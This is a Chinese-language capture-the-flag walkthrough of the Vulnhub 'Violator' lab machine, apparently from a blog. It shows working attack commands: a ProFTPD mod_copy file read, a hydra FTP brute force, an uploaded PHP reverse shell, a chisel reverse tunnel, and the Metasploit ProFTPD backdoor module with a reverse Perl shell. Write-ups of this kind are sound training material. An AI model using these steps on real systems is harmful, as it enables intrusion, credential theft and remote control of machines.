信息收集

IP address	Opening Ports
192.168.101.148	TCP:21,80,2121

$ nmap -p- 192.168.101.148 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Unix

ProFTPD 本地权限

ftp> site cpfr /proc/self/root

ftp> site cpto /var/www/html/root

[Vulnhub] violator ProFTPD+权限提升插图

http://192.168.101.148/root/

[Vulnhub] violator ProFTPD+权限提升插图1

http://192.168.101.148/root/etc/passwd

[Vulnhub] violator ProFTPD+权限提升插图2

$ cewl -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt
$ sed 's/ //g' violator.txt > violator_nospaces
$ cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > password.txt

$ hydra -L username.txt -P password.txt ftp://192.168.101.148

username:af
password:enjoythesilence

username:dg
password:policyoftruth

[Vulnhub] violator ProFTPD+权限提升插图3

$ cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html

(dg)$ ftp 192.168.101.148

(dg)ftp> put /var/www/html/php-reverse-shell.php

http://192.168.101.148/php-reverse-shell.php

[Vulnhub] violator ProFTPD+权限提升插图4

ProFTPD backdoor 权限提升

www-data@violator:/$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@violator:/$ su dg

[Vulnhub] violator ProFTPD+权限提升插图5

dg@violator:/$ sudo -l

[Vulnhub] violator ProFTPD+权限提升插图6

[Vulnhub] violator ProFTPD+权限提升插图7

dg@violator:/$ cat /home/aw/hint

[Vulnhub] violator ProFTPD+权限提升插图8

dg@violator:/$ sudo /home/dg/bd/sbin/proftpd

dg@violator:/$ netstat -lnput

[Vulnhub] violator ProFTPD+权限提升插图9

telnet 127.0.0.1 2121

[Vulnhub] violator ProFTPD+权限提升插图10

echo dg ALL=$ALL:ALL$ ALL > /tmp/dg

[Vulnhub] violator ProFTPD+权限提升插图11

$ chisel server -p 8000 --reverse

dg@violator:/$ ./chisel client 192.168.101.128:8000 R:2121:127.0.0.1:2121&

$ msfconsole
use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set lhost 192.168.101.128
msf exploit(proftpd_133c_backdoor) > set rhost 127.0.0.1
msf exploit(proftpd_133c_backdoor) > set rport 2121
msf exploit(proftpd_133c_backdoor) > exploit

[Vulnhub] violator ProFTPD+权限提升插图12

cat /root/flag.txt

[Vulnhub] violator ProFTPD+权限提升插图13

[Vulnhub] violator ProFTPD+权限提升插图14

root@violator:/root# python3 -m http.server 9999

[Vulnhub] violator ProFTPD+权限提升插图15

$ rar2john crocs.rar > hash

$ john hash --wordlist=../Desktop/password.txt

password:World in My Eyes

[Vulnhub] violator ProFTPD+权限提升插图16

$ unrar x crocs.rar

[Vulnhub] violator ProFTPD+权限提升插图17

[Vulnhub] violator ProFTPD+权限提升插图18

使用image to ascii 工具来查看图片信息

https://github.com/MartinxMax/ImageToAscii

[Vulnhub] violator ProFTPD+权限提升插图19

$ exiftool artwork.jpg

[Vulnhub] violator ProFTPD+权限提升插图20

[Vulnhub] violator ProFTPD+权限提升插图21

https://www.dcode.fr/enigma-machine-cipher

ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE INTO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Vulnhub] violator ProFTPD+权限提升

信息收集

ProFTPD 本地权限

ProFTPD backdoor 权限提升

相关文章

发布评论取消回复

[Vulnhub] violator ProFTPD+权限提升

信息收集

ProFTPD 本地权限

ProFTPD backdoor 权限提升

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复